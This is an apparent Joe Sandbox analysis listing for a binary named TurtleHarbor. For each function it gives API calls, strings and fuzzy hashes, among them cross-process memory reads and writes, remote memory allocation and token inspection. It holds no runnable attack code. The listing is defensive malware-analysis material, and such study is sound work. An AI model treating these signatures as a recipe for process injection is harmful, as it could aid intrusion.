API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
String ID:
API String ID: 3824534824-0
Opcode ID: 5d82fe1f70c4291e65d7959a668835ce8448ca6d9e466b7a60741f281ce06867
Instruction ID: 221737c258b62b0bddedcdc05308c891b44b92a961deb886072a6ccaff905a84
Opcode Fuzzy Hash: 5d82fe1f70c4291e65d7959a668835ce8448ca6d9e466b7a60741f281ce06867
Instruction Fuzzy Hash: A9110876908758BFC7178BA8AC48ADB7BACEB46320F144256F819D3350D6B58D0487F0

Function 00368E20 Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON

Download Yara Rule

APIs

GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00368E3C
GetLastError.KERNEL32(?,00368900,?,?,?), ref: 00368E46
GetProcessHeap.KERNEL32(00000008,?,?,00368900,?,?,?), ref: 00368E55
HeapAlloc.KERNEL32(00000000,?,00368900,?,?,?), ref: 00368E5C
GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00368E73

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: HeapObjectSecurityUser$AllocErrorLastProcess
String ID:
API String ID: 842720411-0
Opcode ID: f54c51148a0a5e99abb894f3c1dca40cd08fffe06f3fe8fae2ece4c76903b56a
Instruction ID: 0350be4c28caf22318a98916646c9996a7dd8c7fcd5313d64ccd6f6a72226978
Opcode Fuzzy Hash: f54c51148a0a5e99abb894f3c1dca40cd08fffe06f3fe8fae2ece4c76903b56a
Instruction Fuzzy Hash: 1B0181B4241204BFDB264FA5DC48DAB7FADEF8B354B104629F849C2220DB329C10CAA0

Function 003757FF Relevance: 7.5, APIs: 5, Instructions: 48sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 0037581B
QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00375829
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00375831
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 0037583B
Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00375877

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: PerformanceQuery$CounterSleep$Frequency
String ID:
API String ID: 2833360925-0
Opcode ID: 1836afe6f6fcd444bce7c82f510c3e79b8ffba0498518c619615db752cf7e151
Instruction ID: 90681216531d20b0cc6582942e21707898569a1ca10c9688adf3a124e522d983
Opcode Fuzzy Hash: 1836afe6f6fcd444bce7c82f510c3e79b8ffba0498518c619615db752cf7e151
Instruction Fuzzy Hash: 4F016D35E01A2DEBCF1A9FE4D848AEDBBBCFB0A711F018559E505B2140CB749550CBA2

Function 00367D28 Relevance: 7.5, APIs: 5, Instructions: 48stringCOMMON

Download Yara Rule

APIs

CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00367C62,80070057,?,?,?,00368073), ref: 00367D45
ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00367C62,80070057,?,?), ref: 00367D60
lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00367C62,80070057,?,?), ref: 00367D6E
CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00367C62,80070057,?), ref: 00367D7E
CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00367C62,80070057,?,?), ref: 00367D8A

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: From$Prog$FreeStringTasklstrcmpi
String ID:
API String ID: 3897988419-0
Opcode ID: 10aca8a690f49f76e9421e5270cbc6a2446f4bac01a8d765c66f721fa03314a7
Instruction ID: e830f0ca496bbe27388e516a34259118a13f7823de12637766ee82291a3eb9f4
Opcode Fuzzy Hash: 10aca8a690f49f76e9421e5270cbc6a2446f4bac01a8d765c66f721fa03314a7
Instruction Fuzzy Hash: D501DF76601214BBCB128F24DC04BAA7BADEF44756F548424FC08D2214E735ED00CBE0

Function 00368CC7 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00368CDE
GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00368CE8
GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00368CF7
HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00368CFE
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00368D14

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 7d7c39919f9e7a42a4e9d18d27422b86d87bc475fa85bcf19b13ae71ecfe23b5
Instruction ID: 554308314a6ecdf04680412331eee6e86a582d8922e6a682700f66d4a16bf3d0
Opcode Fuzzy Hash: 7d7c39919f9e7a42a4e9d18d27422b86d87bc475fa85bcf19b13ae71ecfe23b5
Instruction Fuzzy Hash: 58F04F35200204AFEF164FA59C89EAB3BADEF4A754F108525FA45C6190CB619C41DB70

Function 00368D28 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00368D3F
GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00368D49
GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00368D58
HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00368D5F
GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00368D75

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 746c7d5bf9c90837745eb9937cb36f285f2ae73bfe3666e332a5e06d2ed6ee9f
Instruction ID: e711be16bf7b5f39c4139491d0dedfe7c90e25bf45d10e90e56bae8605bb4158
Opcode Fuzzy Hash: 746c7d5bf9c90837745eb9937cb36f285f2ae73bfe3666e332a5e06d2ed6ee9f
Instruction Fuzzy Hash: 6CF0AF74200204AFEB120FA4EC88FAB3BACEF4E758F044615F944C21A0CBB09D00DB70

Function 0036CD7C Relevance: 7.5, APIs: 5, Instructions: 41windowtimeCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003E9), ref: 0036CD90
GetWindowTextW.USER32(00000000,?,00000100), ref: 0036CDA7
MessageBeep.USER32(00000000), ref: 0036CDBF
KillTimer.USER32(?,0000040A), ref: 0036CDDB
EndDialog.USER32(?,00000001), ref: 0036CDF5

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: BeepDialogItemKillMessageTextTimerWindow
String ID:
API String ID: 3741023627-0
Opcode ID: 6c9b764b9556e865a0b4af17319d1182f31f128f89b715581fea70e984c0715e
Instruction ID: 97e57d710a6a8190c110467e5b129d7e4468c43bbd10193baac0479e9703962d
Opcode Fuzzy Hash: 6c9b764b9556e865a0b4af17319d1182f31f128f89b715581fea70e984c0715e
Instruction Fuzzy Hash: 7801D130510708ABEB265F20DD8EBB67BBCFB01705F004669F5C2A14E1DBF0A9548B80

Function 0031178C Relevance: 7.5, APIs: 5, Instructions: 29COMMON

Download Yara Rule

APIs

EndPath.GDI32(?), ref: 0031179B
StrokeAndFillPath.GDI32(?,?,0034BBC9,00000000,?), ref: 003117B7
SelectObject.GDI32(?,00000000), ref: 003117CA
DeleteObject.GDI32 ref: 003117DD
StrokePath.GDI32(?), ref: 003117F8

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: Path$ObjectStroke$DeleteFillSelect
String ID:
API String ID: 2625713937-0
Opcode ID: 9548f61f45f8608c589bfbcee82694c104dde0753adf7b846924743691f84a11
Instruction ID: a0049cbdb50d969f419db44a7783fdeb6ca2a0c75afc0d998fb41ca29418d0a1
Opcode Fuzzy Hash: 9548f61f45f8608c589bfbcee82694c104dde0753adf7b846924743691f84a11
Instruction Fuzzy Hash: 3FF0C930009209ABDB2B9F25FC4D79D3BA8A705326F148216E529552F0E7314995EF11

Function 0037C9DA Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 279comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 0037CA75
CoCreateInstance.OLE32(003A3D3C,00000000,00000001,003A3BAC,?), ref: 0037CA8D

Part of subcall function 00321A36: _memmove.LIBCMT ref: 00321A77

CoUninitialize.OLE32 ref: 0037CCFA

Strings

.lnk, xrefs: 0037CA09, 0037CA31, 0037CA3B

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize_memmove
String ID: .lnk
API String ID: 2683427295-24824748
Opcode ID: 30256676f070d65b7725d5d74d0dfe1450345a4ff4d7d0e3d6d20125b00bf0d4
Instruction ID: 35e10bceee2e2e98f3d40359a1b4c191a22d57133ed245b05a6e1fc85abf3510
Opcode Fuzzy Hash: 30256676f070d65b7725d5d74d0dfe1450345a4ff4d7d0e3d6d20125b00bf0d4
Instruction Fuzzy Hash: 00A16CB1104205AFD305EF64DC81EABB7ECEF99314F00491CF5559B2A2EB70EA49CB92

Function 0031E3C6 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 265COMMON

Download Yara Rule

APIs

Part of subcall function 00330FE6: std::exception::exception.LIBCMT ref: 0033101C
Part of subcall function 00330FE6: __CxxThrowException@8.LIBCMT ref: 00331031

Part of subcall function 00321A36: _memmove.LIBCMT ref: 00321A77

Part of subcall function 00321680: _memmove.LIBCMT ref: 003216DB

__swprintf.LIBCMT ref: 0031E598

Strings

\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 0031E431

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
API String ID: 1943609520-557222456
Opcode ID: e8479ef40f912ef193b2d878d960dfebb37cf913c929e4db0d24617d770f6fa6
Instruction ID: 432efaf13f4d997f68f5bf04fd17554111c4d6e9179a2c1230dfbde2beb871c0
Opcode Fuzzy Hash: e8479ef40f912ef193b2d878d960dfebb37cf913c929e4db0d24617d770f6fa6
Instruction Fuzzy Hash: 729193715082519FC71AEF24D995C6FB7B8EF99300F41491DF8459B2A1EB30ED48CB92

Function 0037BF7E Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON

Download Yara Rule

APIs

Part of subcall function 00330284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00322A58,?,00008000), ref: 003302A4

CoInitialize.OLE32(00000000), ref: 0037BFFE
CoCreateInstance.OLE32(003A3D3C,00000000,00000001,003A3BAC,?), ref: 0037C017
CoUninitialize.OLE32 ref: 0037C034

Part of subcall function 00314D37: __itow.LIBCMT ref: 00314D62
Part of subcall function 00314D37: __swprintf.LIBCMT ref: 00314DAC

Strings

.lnk, xrefs: 0037BFE0, 0037BFEE

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
String ID: .lnk
API String ID: 2126378814-24824748
Opcode ID: 1c360614984d920103d294d7ca9b3e8c4ede8d61619f0751cbac2f9e9c1f6c59
Instruction ID: d76604d8db8c29cccfc2a76b7fa96bb1584616b8f2eb1b9b225c1fd932b17387
Opcode Fuzzy Hash: 1c360614984d920103d294d7ca9b3e8c4ede8d61619f0751cbac2f9e9c1f6c59
Instruction Fuzzy Hash: 98A152742042019FCB16EF64C884E5ABBE5FF89314F05899CF8999B3A2CB35ED45CB91

Function 0033523D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 003352CD

Part of subcall function 00340320: __87except.LIBCMT ref: 0034035B

Strings

pow, xrefs: 003352A5, 003352C2

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: ErrorHandling__87except__start
String ID: pow
API String ID: 2905807303-2276729525
Opcode ID: f850aea9d475d4fca2b022956aa340c9d28b53d96821175005385b578bbe5349
Instruction ID: 33691b8c6fa44c9fe81221f6deb60d03321aef309d6f7ab309d047972e483c82
Opcode Fuzzy Hash: f850aea9d475d4fca2b022956aa340c9d28b53d96821175005385b578bbe5349
Instruction Fuzzy Hash: 9E517925F09A0197CB1BBB15C98136A7BD8DB00760F254D68E6C1CE6E5EF389CC49E42

Function 00330654 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 163COMMON

Download Yara Rule

Strings

+, xrefs: 00330690
#, xrefs: 00330699

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID:
String ID: #$+
API String ID: 0-2552117581
Opcode ID: 08d24e43695f61dfe5e2863fbca988904fc3980b6bd43d2946b7ad0a992f2090
Instruction ID: d1f311b3e7674474d08c9ce646889c0acc6d0364212e2e06feaea5c33303b885
Opcode Fuzzy Hash: 08d24e43695f61dfe5e2863fbca988904fc3980b6bd43d2946b7ad0a992f2090
Instruction Fuzzy Hash: 55512575500255CFDF1BDF68C892AFA7BA8EF55314F158055FC92AB290D734AC82CBA0

Function 0031E7F7 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 161COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 0031E937
_memmove.LIBCMT ref: 0031E9D0
_free.LIBCMT ref: 0031E9F6
_memmove.LIBCMT ref: 0031EAA9

Strings

#V2, xrefs: 0031E9E2

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: _memmove$_free
String ID: #V2
API String ID: 2620147621-3783035641
Opcode ID: 30423e80eb33b76ab75d7cb3d700c62dad74ebc53f5bef99f02db3e087bd364c
Instruction ID: f8fdf14cd66b724f69b97aa7efc78d3f737cd3ecf6a345c9e9fcd978909edc7e
Opcode Fuzzy Hash: 30423e80eb33b76ab75d7cb3d700c62dad74ebc53f5bef99f02db3e087bd364c
Instruction Fuzzy Hash: D8514B71A083418FDB29CF28C491B6BB7E5BF89314F15492DE98987261E732E845CB52

Function 0032CF0C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 143COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0032CFC2
_memmove.LIBCMT ref: 0032D060
_memset.LIBCMT ref: 0032D084

Strings

ERCP, xrefs: 0032CF2D

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: _memset$_memmove
String ID: ERCP
API String ID: 2532777613-1384759551
Opcode ID: 6994141e081e00277122c74a827422d8d51ad0eef0ba244e66c7494ffd050a4b
Instruction ID: 2ac2fb9b8196fc46e41ed8fcb535aee8539ab859657909cf09998d7c1293a56e
Opcode Fuzzy Hash: 6994141e081e00277122c74a827422d8d51ad0eef0ba244e66c7494ffd050a4b
Instruction Fuzzy Hash: EA51F6719007199FDB26CF65D885BAABBF8EF04314F24C56EE94ACB251E730D985CB40

Function 0036A3AD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 122windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00371CBB: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00369E4E,?,?,00000034,00000800,?,00000034), ref: 00371CE5

SendMessageW.USER32(?,00001104,00000000,00000000), ref: 0036A3F7

Part of subcall function 00371C86: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00369E7D,?,?,00000800,?,00001073,00000000,?,?), ref: 00371CB0

Part of subcall function 00371BDD: GetWindowThreadProcessId.USER32(?,?), ref: 00371C08
Part of subcall function 00371BDD: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00369E12,00000034,?,?,00001004,00000000,00000000), ref: 00371C18
Part of subcall function 00371BDD: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00369E12,00000034,?,?,00001004,00000000,00000000), ref: 00371C2E

SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0036A464
SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0036A4B1

Strings

@, xrefs: 0036A4C9

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
String ID: @
API String ID: 4150878124-2766056989
Opcode ID: d70beac163bb0714210f38717bd1d7e1a2b48dcc27ed4854e271d109c1566bc0
Instruction ID: 4905dbbbe0cd96bdadd7d0dc63dd55dba566072ea0ef3682c18e9ceff9a73cf1
Opcode Fuzzy Hash: d70beac163bb0714210f38717bd1d7e1a2b48dcc27ed4854e271d109c1566bc0
Instruction Fuzzy Hash: F0413D7294021CBFDB22DBA4CD85ADEB7B8EF45300F008095FA55BB290DA706E45CFA1

Function 00397F6B Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,003A0980,00000000,?,?,?,?), ref: 00398004
GetWindowLongW.USER32 ref: 00398021
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00398031

Strings

SysTreeView32, xrefs: 00397FD6

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: Window$Long
String ID: SysTreeView32
API String ID: 847901565-1698111956
Opcode ID: c75b2dc3fef9a83bcd6459644e00986808eee18c1fa278c3dcdc16fbef5aa15a
Instruction ID: 6cad66f0e624f43761ccd3c107df15ac5f2585d52360439831f47f2f5f9f9228
Opcode Fuzzy Hash: c75b2dc3fef9a83bcd6459644e00986808eee18c1fa278c3dcdc16fbef5aa15a
Instruction Fuzzy Hash: 6731AE31214205AADF169F34CC45BEB77A9EB49324F254725F875A32E0DB31E8948B50

Function 003979FE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00397A86
SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00397A9A
SendMessageW.USER32(?,00001002,00000000,?), ref: 00397ABE

Strings

SysMonthCal32, xrefs: 00397A51

Memory Dump Source

